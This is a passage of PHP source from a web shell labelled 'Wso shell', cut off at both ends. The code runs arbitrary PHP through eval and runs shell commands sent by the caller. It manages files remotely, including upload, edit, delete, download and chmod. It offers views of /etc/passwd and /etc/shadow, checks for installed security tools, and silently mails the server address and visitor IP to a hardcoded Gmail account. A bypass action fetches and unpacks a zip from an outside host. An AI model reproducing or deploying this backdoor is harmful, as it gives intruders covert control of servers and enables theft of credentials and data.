<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select> \r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/> \r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo 